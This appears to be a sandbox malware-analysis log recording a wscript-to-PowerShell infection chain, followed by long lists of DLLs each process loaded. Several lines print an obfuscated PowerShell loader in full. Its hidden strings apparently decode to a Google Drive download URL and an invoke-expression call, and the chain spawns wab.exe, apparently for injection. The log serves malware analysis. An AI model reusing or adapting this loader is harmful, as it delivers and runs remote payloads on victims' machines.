Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
